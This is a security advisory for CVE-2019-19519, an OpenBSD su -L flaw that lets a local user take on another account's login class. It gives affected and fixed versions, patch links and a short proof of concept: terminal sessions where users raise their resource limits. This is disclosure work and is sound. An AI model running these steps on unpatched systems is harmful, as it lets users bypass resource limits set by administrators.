ASA-2019-00650 – OpenBSD: Local privilege escalation via su


Allele Security Alert

ASA-2019-00650

Identifier(s)

ASA-2019-00650, CVE-2019-19519

Title

Local privilege escalation via su

Vendor(s)

The OpenBSD Project

Product(s)

OpenBSD

Affected version(s)

OpenBSD versions 6.6 before errata 012
OpenBSD versions 6.5 before errata 023

Fixed version(s)

OpenBSD version 6.6 errata 012
OpenBSD version 6.5 errata 023

OpenBSD versions 6.6 with the following patch applied:

012_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/012_suauth.patch.sig

OpenBSD versions 6.5 with the following patch applied:

023_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/023_suauth.patch.sig

Proof of concept

Yes

Description

A local attacker can exploit su’s -L option (“Loop until a correct username and password combination is entered”) to log in as themselves but with another user’s login class (with the exception of root’s login class if the attacker is not in the group “wheel”), because the class variable is set once and never reset.

Technical details

60 int
61 main(int argc, char **argv)
62 {
...
174 for (;;) {
...
210 if (!class && pwd && pwd->pw_class && pwd->pw_class[0] != '\0')
211 class = strdup(pwd->pw_class);

In the following example, Jane (who is a member of the group “wheel”) logs in with root’s login class (“daemon”), thereby increasing her resource limits:

$ id
uid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)

$ ulimit -H -a
...
processes 512

$ su -l -L
login: root
Password:
Login incorrect
login: jane
Password:

$ id
uid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)

$ ulimit -H -a
...
processes 1310

In the following example, John (who is not a member of the group “wheel”) logs in with _pbuild’s login class (“pbuild”), thereby increasing his resource limits:

$ id
uid=1001(john) gid=1001(john) groups=1001(john)

$ ulimit -H -a
...
data(kbytes) 786432
...
processes 256

$ su -l -L
login: _pbuild
Password:
Login incorrect
login: john
Password:

$ id
uid=1001(john) gid=1001(john) groups=1001(john)

$ ulimit -H -a
...
data(kbytes) 33554432
...
processes 1024

Credits

Qualys Research Team

Reference(s)

OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html

OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html

012_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/012_suauth.patch.sig

023_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/023_suauth.patch.sig

In -L (loop) mode, reset the login class each time through the loop.
https://github.com/openbsd/src/commit/13053edc2f30540fa66763e29d0a8eec43f1aa53

oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5

Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14

Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8

CVE-2019-19519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19519

CVE-2019-19519
https://nvd.nist.gov/vuln/detail/CVE-2019-19519

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: December 16, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.